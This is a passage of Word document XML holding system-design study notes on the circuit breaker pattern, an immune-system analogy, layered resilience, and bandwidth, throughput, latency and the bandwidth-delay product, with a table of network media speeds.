            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Circuit Breaker Equivalent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="41A1C74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372D91" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Immune system detects pathogen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DBCF05" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>CB detects failure pattern</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="273AEC5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662403" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Fever (systemic response)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807CA7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Circuit OPENS (systemic protection)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="23A6C9B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8A4929" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Quarantine (isolate the threat)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25652A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Traffic stopped to failing service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="621E40A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960418" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Recovery period (rest)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27DB8C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Wait duration (downstream recovers)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="07AF673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A25839" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Gradual reintroduction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1F6697" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Half-open probes (test recovery)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="5FDBEC9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170024" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Full health restored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6D6581" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:r w:rsidRPr="006E6644">
              <w:t>Circuit CLOSED (normal operation)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="131037D2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The three layers of protection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703A3A65" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DF1CFF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Layer 1: Timeout        → Protects a SINGLE request from waiting forever</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E68101D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Layer 2: Circuit Breaker → Protects the SYSTEM from repeated timeout costs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793F328D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Layer 3: Bulkhead       → Protects OTHER DEPENDENCIES from being affected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08833B8B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The core principle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9001C3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>It's better to give users a fast, definite "no" than a slow, uncertain "maybe."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A06D82" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>A 1ms circuit breaker rejection with a meaningful fallback ("recommendations unavailable, showing popular items") provides infinitely better user experience than a 30-second timeout followed by a generic error page. And it protects the entire system from cascading into total failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9FFCE7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRDefault="006E6644" w:rsidP="00AD5AD3">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60E960F6" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bandwidth in System Design — In-Depth Technical Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74399674" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. What Bandwidth Really Means</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604DDF38" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:lastRenderedPageBreak/>
        <w:t>Bandwidth is the maximum rate at which data can be transferred across a network path or through a system component in a given amount of time. It represents the </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>capacity</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> of a communication channel — the theoretical upper limit of data throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26794395" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The critical distinction — Bandwidth vs. Throughput vs. Latency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1522759C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1095"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bandwidth:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> The maximum capacity of the pipe (how wide it is). Measured in bits per second (bps).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6606AA47" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1095"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Throughput:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> The actual amount of data successfully transferred per unit time (how much water actually flows through the pipe). Always ≤ bandwidth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BF4002" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1095"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Latency:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> How long it takes a single unit of data to travel from source to destination (how long a single drop takes to traverse the pipe).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C075AE0" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The highway analogy (refined):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51362E86" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1096"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bandwidth:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Number of lanes on the highway (capacity).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A39AC8" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1096"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Throughput:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Actual number of cars passing per hour (realized capacity — reduced by traffic, accidents, construction).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D75A4CC" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1096"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Latency:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Time for a single car to travel from point A to point B (distance / speed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55402483" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>A critical insight most people miss:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C59FEA" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>You can have HIGH bandwidth with HIGH latency simultaneously. A cargo ship carries enormous bandwidth (petabytes of data on hard drives) but has enormous latency (weeks to cross an ocean). A fiber optic link has high bandwidth AND low latency. A satellite link has high bandwidth but high latency (600ms round trip for geostationary orbit).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7094A42E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bandwidth-Delay Product (BDP):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116B6031" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F55E56E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>BDP = Bandwidth × Round-Trip Time (RTT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4F9E8C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>This represents how much data can be "in flight" (in the pipe) at any given moment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72826F25" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EEDC40" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1097"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>1 Gbps link with 100ms RTT: BDP = 1,000,000,000 × 0.1 = 100,000,000 bits = 12.5 MB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368435D4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1097"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>At any instant, 12.5 MB of data is "inside the pipe" (sent but not yet acknowledged).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0911D0CC" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why BDP matters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B83E03A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1098"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:lastRenderedPageBreak/>
        <w:t>TCP's receive window must be at least BDP to fully utilize the link.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3DDACC" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1098"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>If the window is smaller than BDP, the sender pauses waiting for ACKs → underutilized bandwidth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FFBA20" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1098"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>This is why high-bandwidth, high-latency links (intercontinental, satellite) are notoriously hard to saturate with a single TCP connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75941452" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:pict w14:anchorId="163F4B52">
          <v:rect id="_x0000_i4371" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDC7E8E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Bandwidth at Different Levels of the System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EFF5A9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.1 Network Bandwidth — The Communication Paths</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB039B3" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Physical layer bandwidth (raw capacity):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773"/>
        <w:gridCol w:w="2965"/>
        <w:gridCol w:w="2612"/>
      </w:tblGrid>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="4B64E92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A251AE" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Medium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246F41" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Typical Bandwidth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CCF1CC" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="37418EF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50CF3C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Cat5e Ethernet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2B23BD" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>1 Gbps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06D5B7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Office LAN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="004E7BB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16907D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Cat6a Ethernet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B207CB" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>10 Gbps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E1BE4D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Data center server-to-switch</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="413C59F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ED2353" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Single-mode fiber (1 wavelength)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710D0E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>10–100 Gbps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0EBB83" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Data center, metro links</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="54005F5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536C16" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Single-mode fiber (DWDM, 80+ wavelengths)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66534B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>8–32 Tbps per fiber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965323" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Long-haul backbone</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="513F081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55C56D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>5G cellular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83AB02" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>1–10 Gbps (theoretical peak)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443F59" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Mobile users</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="1C1006E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25E3CB" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>4G LTE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A0DE9B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>100–300 Mbps (theoretical peak)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889D87" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Mobile users</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="6FE05BE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E4C07A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>WiFi 6 (802.11ax)</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B8E0E3" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>9.6 Gbps (theoretical)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9832C4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Wireless LAN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="25D5158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335AF5" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Satellite (LEO, Starlink)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3523FA" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>100–300 Mbps per terminal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B1DF6C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Remote areas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="522BAFA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A73647" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:lastRenderedPageBreak/>
              <w:t>Satellite (GEO)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DA2D03" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>50–100 Mbps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FDC997" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Maritime, aviation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="70FE4EA4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The gap between theoretical and realized bandwidth:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671BD386" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>A 1 Gbps Ethernet link never delivers 1 Gbps of application data because of:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318EB5E4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1099"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Protocol overhead:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
